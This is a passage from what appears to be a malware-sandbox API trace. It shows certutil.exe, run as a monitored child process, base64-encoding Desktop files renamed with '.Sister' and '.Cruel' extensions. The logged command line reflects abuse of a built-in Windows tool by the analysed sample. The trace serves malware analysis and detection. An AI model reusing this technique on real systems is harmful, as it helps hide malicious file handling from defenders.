uBytes=0x10) returned 0x1e34ffab440 [0213.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1e34ffab440, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0213.992] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e34ffadc80 [0213.992] _vsnwprintf (in: _Buffer=0x1e34ffadc80, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6677a7f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0213.992] LocalFree (hMem=0x1e34ffab440) returned 0x0 [0213.992] LocalFree (hMem=0x0) returned 0x0 [0213.992] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0213.993] GetACP () returned 0x4e4 [0213.993] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0213.993] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1e34ffab7c0 [0213.993] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1e34ffab7c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0213.993] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e34ffae100 [0213.993] _vsnwprintf (in: _Buffer=0x1e34ffae100, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6677a7f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0213.993] LocalFree (hMem=0x1e34ffab7c0) returned 0x0 [0213.993] LocalFree (hMem=0x0) returned 0x0 [0213.993] GetACP () returned 0x4e4 [0213.993] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0213.993] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1e34ffab6c0 [0213.993] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1e34ffab6c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0213.993] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e34ffadf00 [0213.993] _vsnwprintf (in: _Buffer=0x1e34ffadf00, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x6677a7f6d8 | out: _Buffer="10.0.15063.447 retailEAUT") returned 21 [0213.993] LocalFree (hMem=0x1e34ffab6c0) returned 0x0 [0213.993] LocalFree (hMem=0x1e34ffadc80) returned 0x0 [0213.993] LocalFree (hMem=0x1e34ffae100) returned 0x0 [0213.993] LocalFree (hMem=0x1e34ffadf00) returned 0x0 [0213.993] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0213.994] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0213.994] GetStockObject (i=0) returned 0x900010 [0213.994] RegisterClassW (lpWndClass=0x6677a7f800) returned 0xc1a2 [0213.994] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1102be [0214.072] NtdllDefWindowProc_W () returned 0x0 [0214.073] NtdllDefWindowProc_W () returned 0x1 [0214.079] NtdllDefWindowProc_W () returned 0x0 [0214.090] UpdateWindow (hWnd=0x1102be) returned 1 [0214.090] PostMessageW (hWnd=0x1102be, Msg=0x400, wParam=0x0, lParam=0x1e34ff9217e) returned 1 [0214.090] GetMessageW (in: lpMsg=0x6677a7f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6677a7f850) returned 1 [0214.090] TranslateMessage (lpMsg=0x6677a7f850) returned 0 [0214.090] DispatchMessageW (lpMsg=0x6677a7f850) returned 0x0 [0214.090] NtdllDefWindowProc_W () returned 0x0 [0214.090] GetMessageW (in: lpMsg=0x6677a7f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6677a7f850) returned 1 [0214.090] TranslateMessage (lpMsg=0x6677a7f850) returned 0 [0214.090] DispatchMessageW (lpMsg=0x6677a7f850) returned 0x0 [0214.091] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x1e34ffa21c0 [0214.091] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x1e34ff99190 [0214.091] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0214.091] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0214.091] SetLastError (dwErrCode=0x80070716) [0214.091] _vsnwprintf (in: _Buffer=0x6677a7f258, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f248 | out: _Buffer="465") returned 3 [0214.091] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x6677a7f010, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0214.091] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1e34ffa40d0 [0214.091] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0214.092] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0214.092] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x6677a7eff0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0214.092] GetLastError () returned 0xcb [0214.092] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.092] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.092] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.092] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.092] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.092] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.092] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.092] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.092] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.092] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.092] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.092] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.093] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.093] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.093] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.093] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.093] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.093] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.093] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.093] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.093] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.093] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x6677a7ecb8 | out: phkResult=0x6677a7ecb8*=0x23c) returned 0x0 [0214.093] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1e34ff99380 [0214.093] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x6677a7f228, lpData=0x6677a7f258, lpcbData=0x6677a7f220*=0x4 | out: lpType=0x6677a7f228*=0x0, lpData=0x6677a7f258*=0x0, lpcbData=0x6677a7f220*=0x4) returned 0x2 [0214.093] LocalFree (hMem=0x1e34ff99380) returned 0x0 [0214.093] RegCloseKey (hKey=0x23c) returned 0x0 [0214.093] LocalFree (hMem=0x0) returned 0x0 [0214.094] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1e34ffbe570 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0214.121] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0214.121] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0214.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0214.122] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1e34ffc1db0 [0214.122] GetComputerNameW (in: lpBuffer=0x1e34ffc1db0, nSize=0x6677a7f220 | out: lpBuffer="NQDPDE", nSize=0x6677a7f220) returned 1 [0214.122] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x6677a7f1f0 | out: lpBuffer=0x0, nSize=0x6677a7f1f0) returned 0 [0214.123] GetLastError () returned 0xea [0214.123] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1e34ffab7c0 [0214.123] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1e34ffab7c0, nSize=0x6677a7f1f0 | out: lpBuffer="NQdPdE", nSize=0x6677a7f1f0) returned 1 [0214.123] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0214.126] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1e34ffc2270, cbCertEncoded=0x9873) returned 0x0 [0214.129] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1e34ffc2270, cbCrlEncoded=0x9873) returned 0x0 [0214.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1e34ffc2270, cbEncoded=0x9873, dwFlags=0x8000, pDecodePara=0x6677a7f0d0, pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154 | out: pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154) returned 0 [0214.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1e34ffc2270, cbEncoded=0x9873, dwFlags=0x8000, pDecodePara=0x6677a7f0d0, pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154 | out: pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154) returned 0 [0214.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1e34ffc2270, cbEncoded=0x9873, dwFlags=0x8000, pDecodePara=0x6677a7f0d0, pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154 | out: pvStructInfo=0x6677a7f160, pcbStructInfo=0x6677a7f154) returned 0 [0214.130] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1e34ffa3290 [0214.140] CryptMsgUpdate (hCryptMsg=0x1e34ffa3290, pbData=0x1e34ffc2270, cbData=0x9873, fFinal=1) returned 0 [0214.140] GetLastError () returned 0x8009310b [0214.140] CryptMsgClose (hCryptMsg=0x1e34ffa3290) returned 1 [0214.141] GetFileAttributesExW (in: lpFileName="2QVQiUvIc2zuhpxx-t.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4.sister"), fInfoLevelId=0x0, lpFileInformation=0x6677a7f180 | out: lpFileInformation=0x6677a7f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873)) returned 1 [0214.141] _vsnwprintf (in: _Buffer=0x6677a7f188, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f178 | out: _Buffer="359") returned 3 [0214.141] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x6677a7ef40, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0214.141] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1e34ffc1e40 [0214.141] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.141] _vsnwprintf (in: _Buffer=0x6677a7e170, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x6677a7f1c8 | out: _Buffer="Input Length = 39027") returned 20 [0214.141] GetFileType (hFile=0x50) returned 0x2 [0214.141] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e170*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6677a7e124, lpReserved=0x0 | out: lpBuffer=0x6677a7e170*, lpNumberOfCharsWritten=0x6677a7e124*=0x14) returned 1 [0214.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.346] _vsnwprintf (in: _Buffer=0x6677a7e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6677a7f1c8 | out: _Buffer="\n") returned 1 [0214.346] GetFileType (hFile=0x50) returned 0x2 [0214.346] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6677a7e124, lpReserved=0x0 | out: lpBuffer=0x6677a7e170*, lpNumberOfCharsWritten=0x6677a7e124*=0x1) returned 1 [0214.548] GetFileAttributesExW (in: lpFileName="2QVQiUvIc2zuhpxx-t.mp4.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4.cruel"), fInfoLevelId=0x0, lpFileInformation=0x6677a7f180 | out: lpFileInformation=0x6677a7f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa75f597, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xaa75f597, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaa7cd000, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xd1d8)) returned 1 [0214.548] _vsnwprintf (in: _Buffer=0x6677a7f188, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f178 | out: _Buffer="361") returned 3 [0214.548] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x6677a7ef40, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0214.548] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1e34ffc2200 [0214.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.548] _vsnwprintf (in: _Buffer=0x6677a7e170, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x6677a7f1c8 | out: _Buffer="Output Length = 53720") returned 21 [0214.548] GetFileType (hFile=0x50) returned 0x2 [0214.548] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e170*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x6677a7e124, lpReserved=0x0 | out: lpBuffer=0x6677a7e170*, lpNumberOfCharsWritten=0x6677a7e124*=0x15) returned 1 [0214.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.551] _vsnwprintf (in: _Buffer=0x6677a7e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6677a7f1c8 | out: _Buffer="\n") returned 1 [0214.551] GetFileType (hFile=0x50) returned 0x2 [0214.551] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6677a7e124, lpReserved=0x0 | out: lpBuffer=0x6677a7e170*, lpNumberOfCharsWritten=0x6677a7e124*=0x1) returned 1 [0214.579] LocalFree (hMem=0x1e34ffc2270) returned 0x0 [0214.579] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0214.579] _vsnwprintf (in: _Buffer=0x6677a7f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f1d8 | out: _Buffer="2022") returned 4 [0214.579] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x6677a7efa0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0214.579] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1e34ff98bd0 [0214.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.579] _vsnwprintf (in: _Buffer=0x6677a7e1d0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x6677a7f228 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0214.579] GetFileType (hFile=0x50) returned 0x2 [0214.579] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e1d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x6677a7e184, lpReserved=0x0 | out: lpBuffer=0x6677a7e1d0*, lpNumberOfCharsWritten=0x6677a7e184*=0x31) returned 1 [0214.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.597] _vsnwprintf (in: _Buffer=0x6677a7e1d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6677a7f228 | out: _Buffer="\n") returned 1 [0214.597] GetFileType (hFile=0x50) returned 0x2 [0214.597] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6677a7e1d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6677a7e184, lpReserved=0x0 | out: lpBuffer=0x6677a7e1d0*, lpNumberOfCharsWritten=0x6677a7e184*=0x1) returned 1 [0214.608] LocalFree (hMem=0x0) returned 0x0 [0214.608] LocalFree (hMem=0x1e34ff99190) returned 0x0 [0214.608] LocalFree (hMem=0x1e34ffa21c0) returned 0x0 [0214.608] SetLastError (dwErrCode=0x80070716) [0214.608] _vsnwprintf (in: _Buffer=0x6677a7f258, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f248 | out: _Buffer="511") returned 3 [0214.608] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x6677a7f010, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0214.608] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1e34ffc20e0 [0214.613] PostQuitMessage (nExitCode=0) [0214.613] GetMessageW (in: lpMsg=0x6677a7f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6677a7f850) returned 0 [0214.613] LocalFree (hMem=0x1e34ffab7c0) returned 0x0 [0214.613] LocalFree (hMem=0x1e34ffc1db0) returned 0x0 [0214.613] LocalFree (hMem=0x0) returned 0x0 [0214.613] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0214.614] GetLastError () returned 0x7e [0214.614] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0214.614] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0214.614] DllMain () returned 0x1 [0214.614] LocalFree (hMem=0x1e34ffab460) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffa40d0) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffc1e40) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffc2200) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ff98bd0) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffc20e0) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffb4c00) returned 0x0 [0214.614] LocalFree (hMem=0x1e34ffa3e60) returned 0x0 [0214.615] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0214.615] GetLastError () returned 0x7e [0214.615] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0214.615] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0214.615] DllMain () returned 0x1 [0214.615] exit (_Code=0) Thread: id = 35 os_tid = 0x12ac Process: id = "9" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1c97f000" os_pid = "0x1070" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 36 os_tid = 0x1068 [0214.906] GetStartupInfoW (in: lpStartupInfo=0x346999fd60 | out: lpStartupInfo=0x346999fd60*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0214.907] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0214.908] __set_app_type (_Type=0x1) [0214.908] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0214.908] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0214.910] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0214.910] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0214.911] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0214.911] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0214.911] WerSetFlags () returned 0x0 [0214.911] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.911] __iob_func () returned 0x7ffcea2dea00 [0214.911] _fileno (_File=0x7ffcea2dea30) returned 1 [0214.911] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0214.911] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0214.912] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0214.912] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0214.912] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0214.913] GetConsoleOutputCP () returned 0x1b5 [0214.913] _vsnwprintf (in: _Buffer=0x346999fcd0, _BufferCount=0xb, _Format=".%d", _ArgList=0x346999fbf8 | out: _Buffer=".437") returned 4 [0214.913] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0214.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.913] GetFileType (hFile=0x50) returned 0x2 [0214.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0214.914] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0214.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.914] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0214.914] GetCommandLineW () returned="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"" [0214.914] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x16e970ab620 [0214.914] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x16e970a38a0 [0214.914] LocalFree (hMem=0x16e970ab620) returned 0x0 [0214.915] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x16e97099fc0 [0214.915] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x16e970a42f0 [0214.915] LocalFree (hMem=0x16e97099fc0) returned 0x0 [0214.915] LocalFree (hMem=0x16e970a38a0) returned 0x0 [0214.915] LocalFree (hMem=0x0) returned 0x0 [0214.915] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0214.915] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0214.915] GetCommandLineW () returned="certutil -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\"" [0214.915] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x16e970ab760 [0214.915] GetSystemTime (in: lpSystemTime=0x346999f9c0 | out: lpSystemTime=0x346999f9c0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x31, wMilliseconds=0x1c7)) [0214.915] SystemTimeToFileTime (in: lpSystemTime=0x346999f9c0, lpFileTime=0x346999f9b8 | out: lpFileTime=0x346999f9b8) returned 1 [0214.916] FileTimeToLocalFileTime (in: lpFileTime=0x346999f9b8, lpLocalFileTime=0x346999f980 | out: lpLocalFileTime=0x346999f980) returned 1 [0214.916] FileTimeToSystemTime (in: lpFileTime=0x346999f980, lpSystemTime=0x346999f6f0 | out: lpSystemTime=0x346999f6f0) returned 1 [0214.916] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x346999f6f0, lpFormat=0x0, lpDateStr=0x346999f800, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0214.916] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x346999f6f0, lpFormat=0x0, lpTimeStr=0x346999f700, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0214.916] _vsnwprintf (in: _Buffer=0x346999f70e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x346999f6d8 | 